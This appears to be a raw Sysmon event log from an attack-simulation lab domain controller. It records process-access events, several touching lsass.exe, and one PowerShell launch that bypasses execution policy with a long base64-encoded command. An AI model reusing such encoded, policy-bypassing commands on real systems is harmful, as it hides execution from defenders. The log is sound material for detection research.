13:54:01.311{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8579-5FCF-9000-000000009101}41524180C:\Windows\system32\cmd.exe{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.317{10ACEC4A-8579-5FCF-9100-000000009101}4172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8579-5FCF-9000-000000009101}4152C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-8579-5FCF-9000-000000009101}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.311{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-9000-000000009101}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 